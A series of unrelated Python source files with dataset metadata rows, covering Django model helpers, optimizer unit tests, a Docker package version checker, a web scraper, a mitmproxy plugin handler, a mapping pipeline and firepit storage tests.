check_steps_for_row_with_previous_step_number(row, step_row, rqst_errors)
if rqst_errors:
break
row.steps.add(step_row)
if rqst_errors:
row.delete()
return None
row.save()
return row
def update_row_w_validated_params(cls, validated_params, rqst_errors):
if 'id' not in validated_params:
rqst_errors.append("'id' is a required key in the validated_params argument")
return None
rqst_id = validated_params['id']
try:
row = cls.objects.get(id=rqst_id)
except cls.DoesNotExist:
rqst_errors.append('Row does not exist for the id: {}'.format(rqst_id))
return None
if 'add_steps' in validated_params:
steps_info = validated_params['add_steps']
cmstepsforsequences_rows = []
for step_id in steps_info:
cmstepsforsequences_rows.append(
get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors)
)
if not rqst_errors:
check_steps_for_given_rows_or_matching_step_number(
row.steps.all(),
cmstepsforsequences_rows,
row,
rqst_errors
)
if not rqst_errors:
cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number)
for step_row in cmstepsforsequences_rows:
check_steps_for_row_with_previous_step_number(row, step_row, rqst_errors)
if rqst_errors:
break
row.steps.add(step_row)
elif 'remove_steps' in validated_params:
steps_info = validated_params['remove_steps']
cmstepsforsequences_rows = []
for step_id in steps_info:
cmstepsforsequences_rows.append(
get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors)
)
if not rqst_errors:
check_steps_for_not_given_rows(
row.steps.all(),
cmstepsforsequences_rows,
row,
rqst_errors
)
if not rqst_errors:
cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number)
for step_row in cmstepsforsequences_rows:
row.steps.remove(step_row)
if rqst_errors:
return None
if 'name' in validated_params:
row.name = validated_params['name']
if cls.check_for_rows_with_given_name(row.name, rqst_errors, rqst_id):
return None
row.save()
return row
def delete_row_w_validated_params(cls, validated_params, rqst_errors):
if 'id' not in validated_params:
rqst_errors.append("'id' is a required key in the validated_params argument")
return
rqst_id = validated_params['id']
try:
row = cls.objects.get(id=rqst_id)
row.delete()
except cls.DoesNotExist:
rqst_errors.append('Row does not exist for the id: {!s}'.format(str(rqst_id)))
def check_for_rows_with_given_name(cls, name, rqst_errors, current_id=None):
found_matching_rows = False
matching_rows = cls.objects.filter(
name__iexact=name
)
if matching_rows:
found_matching_rows = True
row_ids = []
len_of_row_qset = len(matching_rows)
for row in matching_rows:
row_ids.append(row.id)
if len_of_row_qset > 1:
rqst_errors.append(
"Multiple rows with name: {} already exist in db. (Hint - Delete all but one and modify the remaining) id's: {}".format(
name, row_ids))
else:
if not current_id or current_id not in row_ids:
rqst_errors.append(
"Row with name: {} already exists in db. (Hint - Modify that entry) id: {}".format(
name, row_ids[0]))
else:
found_matching_rows = False
return found_matching_rows
def get_stepsforcmsequences_row_with_given_id(row_id, rqst_errors):
row = None
if row_id:
try:
row = picmodels.models.StepsForCMSequences.objects.get(id=row_id)
except picmodels.models.StepsForCMSequences.DoesNotExist:
row = None
rqst_errors.append("No StepsForCMSequences row found with id: {}".format(row_id))
return row
def check_steps_for_given_rows_or_matching_step_number(cur_steps_qset, given_steps_list, row, rqst_errors):
for cm_step in given_steps_list:
if rqst_errors:
break
if cm_step in cur_steps_qset:
rqst_errors.append(
"cm_step with id: {} already exists in row id {}'s steps list (Hint - remove from parameter 'add_steps' list)".format(
cm_step.id,
row.id,
)
)
else:
check_steps_for_row_with_given_step_number(cur_steps_qset, cm_step, row, rqst_errors)
def check_steps_for_not_given_rows(cur_steps_qset, given_steps_list, row, rqst_errors):
for cm_step in given_steps_list:
if cm_step not in cur_steps_qset:
rqst_errors.append(
"cm_step with id: {} does not exists in row id {}'s steps list (Hint - remove from parameter 'remove_stepst' list)".format(
cm_step.id,
row.id,
)
)
def check_steps_for_row_with_given_step_number(cur_steps_qset, given_step_row, row, rqst_errors):
for cm_step in cur_steps_qset:
if cm_step.step_number == given_step_row.step_number:
rqst_errors.append(
"cm_step with id: {} has a step_number of: {}, which already exists in row id {}'s steps list (Hint - remove from parameter 'add_steps' list)".format(
given_step_row.id,
given_step_row.step_number,
row.id,
)
)
break
def check_steps_for_row_with_previous_step_number(sequence_row, given_step_row, rqst_errors):
previous_step_found = False
current_step_number = given_step_row.step_number
if current_step_number <= 1:
return None
previous_step_number = current_step_number - 1
for cm_step in sequence_row.steps.all():
if cm_step.step_number == previous_step_number:
previous_step_found = True
break
if not previous_step_found:
rqst_errors.append(
"Sequence with id: {} does not have a step with 1 less than step row: {}'s step_number (Hint - remove from parameter 'add_steps' list)".format(
sequence_row.id,
given_step_row.return_values_dict(),
)
)
| 34.545455 | 166 | 0.61817 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,098 | 0.137594 |
731a5b94603a881cbdad31e6b399fc2db646e99b | 4,162 | py | Python | elegy/optimizer_test.py | sooheon/elegy | cad6f832cac1a34684c4f4f2c4a386cbfa817623 | [
"Apache-2.0"
]
| null | null | null | elegy/optimizer_test.py | sooheon/elegy | cad6f832cac1a34684c4f4f2c4a386cbfa817623 | [
"Apache-2.0"
]
| null | null | null | elegy/optimizer_test.py | sooheon/elegy | cad6f832cac1a34684c4f4f2c4a386cbfa817623 | [
"Apache-2.0"
]
| null | null | null | import jax
import elegy
import unittest
import numpy as np
import jax.numpy as jnp
import optax
class MLP(elegy.Module):
"""Standard LeNet-300-100 MLP network."""
n1: int
n2: int
def __init__(self, n1: int = 3, n2: int = 4):
super().__init__()
self.n1 = n1
self.n2 = n2
def call(self, image: jnp.ndarray, training: bool):
x = image.astype(jnp.float32) / 255.0
x = jnp.reshape(x, [x.shape[0], -1])
x = elegy.nn.Linear(self.n1)(x)
x = elegy.nn.BatchNormalization()(x)
x = jax.nn.relu(x)
x = elegy.nn.Linear(self.n2)(x)
x = jax.nn.relu(x)
x = elegy.nn.Linear(10)(x)
return x
class OptimizerTest(unittest.TestCase):
def test_optimizer(self):
optax_op = optax.adam(1e-3)
lr_schedule = lambda step, epoch: step / 3
optimizer = elegy.Optimizer(optax_op, lr_schedule=lr_schedule)
params = np.random.uniform((3, 4))
grads = np.random.uniform((3, 4))
rng = elegy.RNGSeq(42)
optimizer_states = optimizer.init(rng, params)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 0 / 3)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 1 / 3)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 2 / 3)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 3 / 3)
def test_optimizer_epoch(self):
optax_op = optax.adam(1e-3)
lr_schedule = lambda step, epoch: epoch
optimizer = elegy.Optimizer(
optax_op, lr_schedule=lr_schedule, steps_per_epoch=2
)
params = np.random.uniform((3, 4))
grads = np.random.uniform((3, 4))
rng = elegy.RNGSeq(42)
optimizer_states = optimizer.init(
rng=rng,
net_params=params,
)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 0)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 0)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 1)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 1)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
def test_optimizer_chain(self):
optimizer = elegy.Optimizer(
optax.sgd(0.1),
optax.clip(0.5),
)
params = np.zeros(shape=(3, 4))
grads = np.ones(shape=(3, 4)) * 100_000
rng = elegy.RNGSeq(42)
optimizer_states = optimizer.init(
rng=rng,
net_params=params,
)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert np.all(-0.5 <= params) and np.all(params <= 0.5)
def test_lr_logging(self):
model = elegy.Model(
module=MLP(n1=3, n2=1),
loss=elegy.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=elegy.metrics.SparseCategoricalAccuracy(),
optimizer=elegy.Optimizer(
optax.adamw(1.0, b1=0.95),
lr_schedule=lambda step, epoch: jnp.array(1e-3),
),
run_eagerly=True,
)
X = np.random.uniform(size=(5, 7, 7))
y = np.random.randint(10, size=(5,))
history = model.fit(
x=X,
y=y,
epochs=1,
steps_per_epoch=1,
batch_size=5,
validation_data=(X, y),
shuffle=True,
verbose=0,
)
assert "lr" in history.history
assert np.allclose(history.history["lr"], 1e-3)
| 30.602941 | 88 | 0.606439 | 4,059 | 0.975252 | 0 | 0 | 0 | 0 | 0 | 0 | 49 | 0.011773 |
731a5f37b2d3af866a1a81886741f91cddda5c09 | 6,929 | py | Python | scripts/version.py | nfnty/docker | cdc68f57fdb6bd472b78d6ef6cbc77f430bd5089 | [
"MIT"
]
| 54 | 2015-03-08T23:45:21.000Z | 2021-01-11T12:35:07.000Z | scripts/version.py | nfnty/docker | cdc68f57fdb6bd472b78d6ef6cbc77f430bd5089 | [
"MIT"
]
| 4 | 2015-04-10T08:58:29.000Z | 2015-11-08T08:34:55.000Z | scripts/version.py | nfnty/docker | cdc68f57fdb6bd472b78d6ef6cbc77f430bd5089 | [
"MIT"
]
| 16 | 2015-04-08T23:54:07.000Z | 2020-04-08T22:03:12.000Z | #!/usr/bin/python3
''' Check image package versions '''
import argparse
import distutils.version
import re
import subprocess
from typing import Any, Dict, Sequence, Tuple
import lxml.html # type: ignore
import requests
from termcolor import cprint
from utils.image import IMAGES, path_dockerfile
TIMEOUT = (31, 181) # (Connect, Read)
HEADERS = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0'}
def args_parse(arguments: Sequence[str] = None) -> argparse.Namespace:
''' Parse arguments '''
par0 = argparse.ArgumentParser(description='Image package version checker')
method = par0.add_mutually_exclusive_group(required=False)
method.add_argument(
'--include', metavar='IMAGE', action='append', choices=IMAGES.keys(),
help='Include image(s)',
)
method.add_argument(
'--exclude', metavar='IMAGE', action='append', choices=IMAGES.keys(),
help='Exclude image(s)',
)
return par0.parse_args(arguments)
def fetch(url: str, timeout: Tuple[int, int]) -> Any:
''' Fetch URL '''
try:
response = requests.get(url, headers=HEADERS, timeout=timeout)
response.raise_for_status()
except (requests.exceptions.Timeout, requests.exceptions.HTTPError) as error:
raise RuntimeError('fetch: {0:s}\n{1:s}'.format(str(error), str(error.response.content)))
except OSError as error:
raise RuntimeError('fetch: {0:s}'.format(str(error)))
return lxml.html.document_fromstring(response.content)
def document_parse(document: Any, xpath: str, attribute: str,
regex: str) -> distutils.version.LooseVersion:
''' xpath version extractor '''
nodes = document.xpath(xpath)
if not nodes:
raise RuntimeError('Incorrect xpath: No nodes')
versions = []
for node in nodes:
if attribute:
string = node.get(attribute)
elif isinstance(node, str):
string = node
else:
string = node.text
if regex:
obj = re.search(regex, string,
flags=(re.MULTILINE | re.DOTALL)) # pylint: disable=no-member
if not obj:
continue
elif len(obj.groups()) > 1:
raise RuntimeError('Incorrect regex: More than 1 capture group')
string = obj.group(1)
if not string:
raise RuntimeError('Incorrect regex: Invalid capture group')
versions.append(distutils.version.LooseVersion(string))
if not versions:
raise RuntimeError('No matching versions')
version: distutils.version.LooseVersion = sorted(versions, reverse=True)[0]
if not version or not hasattr(version, 'vstring'):
raise RuntimeError('Version is invalid')
return version
def version_scrape(url: str, xpath: str, attribute: str,
regex: str) -> distutils.version.LooseVersion:
''' Scrape latest version from url '''
document = fetch(url, TIMEOUT)
return document_parse(document, xpath, attribute, regex)
def version_pacman(package: str) -> Dict[str, distutils.version.LooseVersion]:
''' Return dict with repository versions of package '''
try:
output = subprocess.run([
'/usr/bin/expac', '--sync', '--search',
'%n %r %v',
r'^{0:s}$'.format(re.escape(package)),
], check=True, stdout=subprocess.PIPE).stdout.decode('UTF-8')
except subprocess.CalledProcessError:
raise RuntimeError('{0:s} not in any repository'.format(package))
versions: Dict[str, distutils.version.LooseVersion] = {}
for line in output.splitlines():
name, repo, version = line.split()
if name == package:
versions[repo] = distutils.version.LooseVersion(version)
return versions
def dockerfile_update(path: str, variable: str, version: str) -> None:
''' Update Dockerfiles with current version '''
with open(path, 'r') as fobj:
newfile, found = re.subn(
r'{0:s}=\'\S*\''.format(variable),
'{0:s}=\'{1:s}\''.format(variable, version),
fobj.read(),
)
if not found:
raise ValueError('Did not find ENV variable')
elif found > 1:
raise ValueError('More than 1: {0:s}'.format(variable))
with open(path, 'w') as fobj:
fobj.write(newfile)
def main() -> None: # pylint: disable=too-many-branches
''' Main '''
subprocess.check_call(['/usr/bin/sudo', '/usr/bin/pacman', '--sync', '--refresh'])
if ARGS.include:
images = {image: config for image, config in IMAGES.items() if image in ARGS.include}
elif ARGS.exclude:
images = {image: config for image, config in IMAGES.items() if image not in ARGS.exclude}
else:
images = IMAGES
for image, image_dict in sorted(images.items(), key=lambda item: item[0]):
cprint('\n{0:s}'.format(image), 'white', attrs=['underline'])
if 'Check' in image_dict and not image_dict['Check']:
print('Not checked!')
continue
if 'Packages' not in image_dict:
print('No packages!')
continue
for package, package_dict in image_dict['Packages'].items():
cprint('{0:s}:'.format(package), 'yellow')
for source, source_dict in package_dict['Sources'].items():
try:
source_dict['Version'] = version_scrape(
source_dict['URL'],
source_dict['XPath'],
source_dict['Attribute'] if 'Attribute' in source_dict else None,
source_dict['Regex'] if 'Regex' in source_dict else None,
)
except RuntimeError as error:
cprint('{0:s}: {1:s}'.format(source, str(error)), 'red')
source_dict['Version'] = None
try:
for repo, version in version_pacman(package).items():
package_dict['Sources'][repo] = {'Version': version}
except RuntimeError as error:
cprint(str(error), 'red')
for source, source_dict in package_dict['Sources'].items():
print('{0:15s}{1:s}'.format(
source,
source_dict['Version'].vstring if source_dict['Version'] else 'None',
))
if not package_dict['Sources'][package_dict['Download']]['Version']:
cprint('No Version for Download: {0:s}'.format(
package_dict['Download']), 'red')
continue
dockerfile_update(
path_dockerfile(image),
package_dict['Variable'],
package_dict['Sources'][package_dict['Download']]['Version'].vstring,
)
if __name__ == '__main__':
ARGS = args_parse()
main()
| 35.533333 | 97 | 0.593159 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,387 | 0.200173 |
731bcc2e7423a542f77047dce4151ada325579ea | 2,441 | py | Python | nazrul.py | rakesh0703/Content_Parser_of_works_of_kazi_nazrul | c3e2060effe7b7576ee5b034a9aba3df648d6358 | [
"Apache-2.0"
]
| null | null | null | nazrul.py | rakesh0703/Content_Parser_of_works_of_kazi_nazrul | c3e2060effe7b7576ee5b034a9aba3df648d6358 | [
"Apache-2.0"
]
| null | null | null | nazrul.py | rakesh0703/Content_Parser_of_works_of_kazi_nazrul | c3e2060effe7b7576ee5b034a9aba3df648d6358 | [
"Apache-2.0"
]
| null | null | null | # -- coding: UTF-8 --
"""
Spyder Editor
This is a temporary script file.
"""
from bs4 import BeautifulSoup
import sys
import os
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
import urllib.parse,urllib.request,urllib.error
base="https://nazrul-rachanabali.nltr.org/"
page=urllib.request.urlopen(base).read();
soup=BeautifulSoup(page,'html5lib')
ba=soup.find_all("ul",{"class":["slidedoormenu"]})
#print(ba)
d=soup.div.ul.find_all('a')
#type(d[3])
article_page=(d[3]).get("href")
#soup.div.ul.li.a
newurl_2=base+article_page
page1=urllib.request.urlopen(newurl_2).read()
soup1=BeautifulSoup(page1,'html5lib')
e=soup1.find_all('a')
arr1=[]
arr4=[]
for link in e[1:9]:
f=link.get('href')
f=base+f
arr1.append(f)
arr4.append(link.get_text())
#for k in arr2:
for m in range(0,len(arr4)):
page1=urllib.request.urlopen(arr1[m]).read()
soup1=BeautifulSoup(page1,'html5lib')
x=soup1.find_all('div',id='data')
arr2=[];
arr3=[];
for i in x:
g=i.find_all('a')
for k in g[:-7]:
arr2.append(k.get('href'))
arr3.append(k.get_text())
for z in range(0,len(arr3)):
final_url=base+arr2[z]
#==============================================================================
# page1=urllib.request.urlopen(final_url).read()
# soup1=BeautifulSoup(page1,'html5lib')
# head = soup1.find_all("p",class_="head1")
# headd=head[0].get_text()
#==============================================================================
filenam = "D:\%s\%s"%(arr4[m],arr3[z])
if not os.path.exists(filenam):
os.makedirs(filenam)
for i in range(0,110):
if arr3[z].endswith(" "):
arr3[z]=arr3[z][:-1]
filename = "D:\%s\%s\%s_%d.txt"%(arr4[m],arr3[z],arr3[z],i)
fi = open(filename, "wb")
page1=urllib.request.urlopen(final_url).read()
soup1=BeautifulSoup(page1,'html5lib')
final_url=base+arr2[z]
h=soup1.find_all('div',id="data")
for j in h:
fi.write(j.text.encode("utf-8"))
s=j.text
if not s.split():
break
a,b=final_url.split('1&titleid=')
final_url=a+str(i+1)+"&titleid="+b
print('************'+final_url+'***********')
fi.close()
| 29.059524 | 87 | 0.530111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 702 | 0.287587 |
731bee30cd85e8877da89abd76314f81852e3106 | 730 | py | Python | algoplex/api/order.py | dmitryaleks/algo-plex | c83421642fc1ac11e558126ec73909b175b07862 | [
"BSD-2-Clause"
]
| null | null | null | algoplex/api/order.py | dmitryaleks/algo-plex | c83421642fc1ac11e558126ec73909b175b07862 | [
"BSD-2-Clause"
]
| null | null | null | algoplex/api/order.py | dmitryaleks/algo-plex | c83421642fc1ac11e558126ec73909b175b07862 | [
"BSD-2-Clause"
]
| null | null | null | class Order():
def __init__(self, side, pair, size, price, stop_loss_price, id):
self.side = side
self.pair = pair
self.size = size
self.price = price
self.stop_loss_price = stop_loss_price
self.id = id
self.fills = []
def define_id(self, id):
self.id = id
def add_fill(self, execution):
self.fills.append(execution)
def get_fill_price(self):
nominator = sum(map(lambda f: f.size * f.price, self.fills))
fill_price = nominator/self.get_filled_quantity()
return fill_price
def get_filled_quantity(self):
return sum(map(lambda f: f.size, self.fills))
def get_fills(self):
return self.fills
| 26.071429 | 69 | 0.609589 | 729 | 0.99863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
731c7020273e619e347b608e87b47d20ed636f00 | 3,515 | py | Python | core/handler.py | mh4x0f/kinproxy | 72dd24eb5ff5286c2bb57524124934a54614f9ec | [
"MIT"
]
| 5 | 2018-01-20T15:33:14.000Z | 2021-06-29T04:26:44.000Z | core/handler.py | mh4x0f/kinproxy | 72dd24eb5ff5286c2bb57524124934a54614f9ec | [
"MIT"
]
| null | null | null | core/handler.py | mh4x0f/kinproxy | 72dd24eb5ff5286c2bb57524124934a54614f9ec | [
"MIT"
]
| 1 | 2019-03-08T18:46:05.000Z | 2019-03-08T18:46:05.000Z | try:
from mitmproxy import controller, proxy
from mitmproxy.proxy.server import ProxyServer
except:
from libmproxy import controller, proxy
from libmproxy.proxy.server import ProxyServer
from plugins import *
from threading import Thread
from core.config.settings import SettingsINI
# MIT License
#
# Copyright (c) 2018 Marcos Nesster
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
class ThreadController(Thread):
def __init__(self,main ,parent=None):
super(ThreadController, self).__init__(parent)
self.main = main
def run(self):
try:
controller.Master.run(self.main)
except KeyboardInterrupt:
self.main.shutdown()
def stop(self):
self.main.shutdown()
class MasterHandler(controller.Master):
def __init__(self, server,session):
controller.Master.__init__(self, server)
self.config = SettingsINI('core/pumpkinProxy.ini')
self.session = session
self.plugins = []
self.initializePlugins()
def run(self):
self.thread = ThreadController(self)
self.thread.start()
def disablePlugin(self,name):
''' disable plugin by name '''
print('plugin:{} status:OFF'.format(name))
for plugin in self.plugins:
if plugin.name == name:
self.plugins.remove(plugin)
def initializePlugins(self):
plugin_classes = plugin.PluginTemplate.__subclasses__()
for p in plugin_classes:
if self.config.get_setting('plugins',p.name,format=bool):
print('plugins::{0:20} status:On'.format(p.name))
self.plugins.append(p())
# initialize logging in all plugins enable
for instance in self.plugins:
instance.init_logger(self.session)
def handle_request(self, flow):
'''
print "-- request --"
print flow.__dict__
print flow.request.__dict__
print flow.request.headers.__dict__
print "--------------"
print
'''
for p in self.plugins:
p.request(flow)
flow.reply()
def handle_response(self, flow):
'''
print
print "-- response --"
print flow.__dict__
print flow.response.__dict__
print flow.response.headers.__dict__
print "--------------"
print
'''
for p in self.plugins:
p.response(flow)
#print flow.__dict__
flow.reply()
| 33.47619 | 80 | 0.657183 | 2,101 | 0.597724 | 0 | 0 | 0 | 0 | 0 | 0 | 1,674 | 0.476245 |
731d1cfc50fdedf83932598a710d90798e979c30 | 4,940 | py | Python | mapping/sandbox/graphslam/graphslam_pipeline.py | sameeptandon/sail-car-log | 0ee3d598bb09d389bcbd2ebf73cd4b2411e796be | [
"BSD-2-Clause"
]
| 1 | 2021-02-24T03:11:13.000Z | 2021-02-24T03:11:13.000Z | mapping/sandbox/graphslam/graphslam_pipeline.py | sameeptandon/sail-car-log | 0ee3d598bb09d389bcbd2ebf73cd4b2411e796be | [
"BSD-2-Clause"
]
| null | null | null | mapping/sandbox/graphslam/graphslam_pipeline.py | sameeptandon/sail-car-log | 0ee3d598bb09d389bcbd2ebf73cd4b2411e796be | [
"BSD-2-Clause"
]
| 3 | 2015-03-18T14:36:04.000Z | 2018-07-04T02:57:24.000Z | import os
from os.path import join as pjoin
from subprocess import check_call
from ruffus import files, follows, pipeline_run, pipeline_printout, pipeline_printout_graph, jobs_limit
from graphslam_config import GRAPHSLAM_PATH,\
GRAPHSLAM_MATCH_DIR, GRAPHSLAM_OPT_POS_DIR, GRAPHSLAM_ALIGN_DIR,\
MATCHES_FILE, GPS_FILES, RSS_LIST, GRAPHSLAM_OUT_DIR, GRAPHSLAM_DIRS,\
GRAPHSLAM_MAPS_DIR, GRAPHSLAM_VIDEOS_DIR, GRAPHSLAM_EVAL_DIR
from pipeline_config import NUM_CPUS, SAIL_CAR_LOG_PATH
from pipeline_utils import print_and_call, touchf
@files(None, MATCHES_FILE)
def match_traces(dummy, output_file):
cmd = 'python %s/match_traces.py %s' % (GRAPHSLAM_PATH, GRAPHSLAM_MATCH_DIR)
print_and_call(cmd)
# NOTE Have to rerun this after match_traces is run
@follows('match_traces')
@files(zip(GPS_FILES, [pjoin(GRAPHSLAM_OPT_POS_DIR, '--'.join(rss) + '.npz') for rss in RSS_LIST], GPS_FILES))
def solve_qps(gps_src_file, output_file, gps_tgt_file):
cmd = 'python %s/solve_qp.py %s %s %s' % (GRAPHSLAM_PATH,
gps_src_file, gps_tgt_file, output_file)
print_and_call(cmd)
@follows('solve_qps')
@jobs_limit(1)
@files(MATCHES_FILE, '%s/run_pipeline_sentinel' % GRAPHSLAM_OUT_DIR)
def run_pipelines(dummy, sentinel):
for route, segment, split in RSS_LIST:
cmd = 'export SCL_ROUTE=%s; export SCL_SEGMENT=%s; export SCL_SPLIT=%s; python %s/mapping/pipeline/pipeline.py run estimate_normals' % (route, segment, split, SAIL_CAR_LOG_PATH)
print_and_call(cmd)
touchf('%s/run_pipeline_sentinel' % GRAPHSLAM_OUT_DIR)
def clean_pipelines():
for route, segment, split in RSS_LIST:
cmd = 'export SCL_ROUTE=%s; export SCL_SEGMENT=%s; export SCL_SPLIT=%s; python %s/mapping/pipeline/pipeline.py clean' % (route, segment, split, SAIL_CAR_LOG_PATH)
print_and_call(cmd)
@follows('run_pipelines')
@files('%s/run_pipeline_sentinel' % GRAPHSLAM_OUT_DIR, '%s/chunk_and_align_sentinel' % GRAPHSLAM_ALIGN_DIR)
def chunk_and_align(dummy, sentinel):
cmd = 'python %s/chunk_and_align.py' % GRAPHSLAM_PATH
print_and_call(cmd)
touchf('%s/chunk_and_align_sentinel' % GRAPHSLAM_ALIGN_DIR)
@follows('chunk_and_align')
@files('%s/chunk_and_align_sentinel' % GRAPHSLAM_ALIGN_DIR,
'%s/export_maps_sentinel' % GRAPHSLAM_MAPS_DIR)
def export_maps(dummy, sentinel):
cmd = 'python scripts/export_maps.py'
print_and_call(cmd)
touchf('%s/export_maps_sentinel' % GRAPHSLAM_MAPS_DIR)
@follows('export_maps')
@files('%s/export_maps_sentinel' % GRAPHSLAM_MAPS_DIR,
'%s/align_maps_sentinel' % GRAPHSLAM_MAPS_DIR)
def align_maps(dummy, sentinel):
cmd = 'python scripts/align_maps_all.py'
print_and_call(cmd)
touchf('%s/align_maps_sentinel' % GRAPHSLAM_MAPS_DIR)
@follows('align_maps')
@files('%s/align_maps_sentinel' % GRAPHSLAM_MAPS_DIR,
'%s/eval_maps_sentinel' % GRAPHSLAM_EVAL_DIR)
def eval_maps(dummy, sentinel):
cmd = 'python scripts/eval_maps.py'
print_and_call(cmd)
touchf('%s/eval_maps_sentinel' % GRAPHSLAM_EVAL_DIR)
@follows('eval_maps')
@files('%s/align_maps_sentinel' % GRAPHSLAM_MAPS_DIR,
'%s/generate_videos_sentinel' % GRAPHSLAM_VIDEOS_DIR)
def generate_videos(dummy, sentinel):
cmd = 'python scripts/generate_videos.py'
print_and_call(cmd)
touchf('%s/generate_videos_sentinel' % GRAPHSLAM_VIDEOS_DIR)
def clean():
for d in GRAPHSLAM_DIRS:
print 'deleting %s' % d
if os.path.exists(d):
check_call('rm -r %s' % d, shell=True)
if __name__ == '__main__':
import sys
if len(sys.argv) < 2:
print 'Usage: python graphslam_pipeline.py print,graph,run (task1,task2)'
sys.exit(1)
TORUN = [
]
if len(sys.argv) == 3:
TORUN = sys.argv[2].split(',')
CMDS = sys.argv[1].split(',')
tasks = {
'print': lambda: pipeline_printout(sys.stdout, TORUN,
forcedtorun_tasks=[], verbose=5),
'graph': lambda: pipeline_printout_graph('graph.jpg', 'jpg', TORUN,
forcedtorun_tasks=[],
no_key_legend=False),
'run': lambda: pipeline_run(TORUN,
multiprocess=NUM_CPUS,
one_second_per_job=False),
'force': lambda: pipeline_run([],
forcedtorun_tasks=TORUN,
multiprocess=NUM_CPUS,
one_second_per_job=False),
'printf': lambda: pipeline_printout(sys.stdout,
[],
forcedtorun_tasks=TORUN,
verbose=2),
'clean': clean,
'clean_pipelines': clean_pipelines
}
for key in tasks:
if key in CMDS:
tasks[key]()
| 37.424242 | 185 | 0.654049 | 0 | 0 | 0 | 0 | 2,448 | 0.495547 | 0 | 0 | 1,232 | 0.249393 |
731e4596b4a14f1da0dc95574358cfa12ef495f2 | 319 | py | Python | sandbox/wavelets.py | EtalumaSupport/LumaViewPro | ab9678c04fc561e6fce8b774c5d87cc91d6f3e07 | [
"MIT"
]
| null | null | null | sandbox/wavelets.py | EtalumaSupport/LumaViewPro | ab9678c04fc561e6fce8b774c5d87cc91d6f3e07 | [
"MIT"
]
| 59 | 2021-03-26T19:22:59.000Z | 2021-12-04T00:42:12.000Z | sandbox/wavelets.py | EtalumaSupport/LumaViewPro | ab9678c04fc561e6fce8b774c5d87cc91d6f3e07 | [
"MIT"
]
| null | null | null | import numpy as np
import matplotlib.pyplot as plt
from astropy.convolution import RickerWavelet2DKernel
ricker_2d_kernel = RickerWavelet2DKernel(5)
plt.imshow(ricker_2d_kernel, interpolation='none', origin='lower')
plt.xlabel('x [pixels]')
plt.ylabel('y [pixels]')
plt.colorbar()
plt.show()
print(ricker_2d_kernel)
| 22.785714 | 66 | 0.793103 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 37 | 0.115987 |
731e657c5103db0d7c66fbe61179c7894a85d4d3 | 5,267 | py | Python | tests/test_errors.py | raymundl/firepit | 5b913806eef646c02bd55e301b19baa052aa29d5 | [
"Apache-2.0"
]
| null | null | null | tests/test_errors.py | raymundl/firepit | 5b913806eef646c02bd55e301b19baa052aa29d5 | [
"Apache-2.0"
]
| null | null | null | tests/test_errors.py | raymundl/firepit | 5b913806eef646c02bd55e301b19baa052aa29d5 | [
"Apache-2.0"
]
| null | null | null | import os
import pytest
from firepit.exceptions import IncompatibleType
from firepit.exceptions import InvalidAttr
from firepit.exceptions import InvalidStixPath
from firepit.exceptions import InvalidViewname
from firepit.exceptions import StixPatternError
from .helpers import tmp_storage
@pytest.fixture
def invalid_bundle_file():
cwd = os.path.dirname(os.path.abspath(__file__))
return os.path.join(cwd, 'test_error_bundle.json')
def test_local(invalid_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [invalid_bundle_file])
def test_extract_bad_stix_pattern(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
with pytest.raises(StixPatternError):
store.extract('junk', 'ipv4-addr', 'q1', "whatever")
def test_filter_bad_stix_pattern(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
store.extract('urls', 'url', 'q1', "[url:value LIKE '%page/1%']")
with pytest.raises(StixPatternError):
store.filter('junk', 'url', 'urls', "value = 'http://www26.example.com/page/176'")
def test_filter_bad_input_view(fake_bundle_file, tmpdir):
store = tmp_storage(tmpdir)
store.cache('q1', [fake_bundle_file])
